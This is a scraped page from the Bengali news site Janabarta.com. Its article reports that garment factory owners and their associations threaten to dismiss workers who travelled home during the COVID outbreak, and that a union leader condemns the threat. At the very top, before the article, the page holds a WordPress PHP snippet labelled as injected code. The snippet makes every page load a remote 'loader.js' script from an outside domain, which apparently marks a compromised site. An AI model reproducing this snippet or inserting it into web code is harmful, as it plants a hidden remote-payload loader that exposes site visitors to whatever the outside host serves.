// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site বাড়ি যাওয়া গার্মেন্টস শ্রমিকরা চাকরি হারাবেন! - Janabarta.com

বাড়ি যাওয়া গার্মেন্টস শ্রমিকরা চাকরি হারাবেন!

নিজস্ব প্রতিবেদক: করোনার এই অপ্রতিরোধ্য প্রাদুর্ভাবের সময়ও মানুষ স্রোতের মতো বাড়ি যাচ্ছে। তাদের অনেকেই গার্মেন্টস শ্রমিক। সরকার এবং মালিকদের নিষেধাজ্ঞা স্বত্ত্বেও যেসব গার্মেন্টস শ্রমিকরা বাড়ি যাচ্ছে তাদের বিষয়ে কঠোর হওয়ার ঘোষণা দিয়েছেন বেশ কয়েকজন মালিক এবং তাদের সংগঠন বিজিএমইএ। তারা সাফ জানিয়ে দিয়েছেন, বাড়ি যাওয়া গার্মেন্টস শ্রমিকদের চাকরি থাকবে না।

নিট পোশাক মালিকদের সংগঠন বিকেএমইএ বাড়ি যাওয়া শ্রমিকদের ব্যাপারে একইভাবে কঠোর হওয়ার সিদ্ধান্ত জানিয়েছে। সংগঠনের প্রথম সহ-সভাপতি মোহাম্মদ হাতেম বলেন, শ্রমিকদেরকে বাড়ি যেতে সরকার মানা করেছে, আমরাও করেছি। এখন তারা যদি এই নির্দেশ অমান্য করে থাকে তাহলে তো চাকরি হারাবেন। সরকারের অনুরোধে দুই মাস কাজ না করার পরও আমরা তাদেরকে বেতন দিয়েছি আর এখন তারা আমাদের কথা শুনবেন না, তা তো হয় না!

তিনি আরো বলেন, গার্মেন্টস সেক্টরের অবস্থা যাচ্ছেতাই। একের পর এক ক্রয়াদেশ বাতিল হচ্ছে, নতুন অর্ডারও ঠিকমতো পাওয়া যাচ্ছে না। এমন পরিস্থিতিতে ঈদের পর শ্রমিক ছাটাই করতে বাধ্য হবে অনেক কারখানা। সেক্ষেত্রে যারা বাড়ি গেছে তারাই ছাটাইয়ের তালিকায় শুরুর দিকে থাকবেন। এছাড়া ইতোমধ্যে যেসব কারখানা বন্ধ হয়ে গেছে, সেসব কারখানার শ্রমিকরা সয়ংক্রিয়ভাবেই চাকরি হারিয়েছেন।

নাম প্রকাশ না করার শর্তে বিজিএমইএ’র এক ঊর্ধ্বতন কর্মকর্তা বলেন, যেসব শ্রমিকরা বাড়ি গেছে তাদের লিস্ট করা হচ্ছে। তারা আর কর্মস্থলে ফিরতে পারবেন না। কর্মস্থলের এলাকায় থাকলেই তার চাকরি থাকবে, অন্যথায় নয়। তবে এমন সিদ্ধান্তকে ‘মগের মুল্লুক’ হিসেবে আখ্যায়িত করেছেন বাংলাদেশ ট্রেড ইউনিয়ন কেন্দ্রের সাধারণ সম্পাদক ওয়াজেদ-উল ইসলাম খান।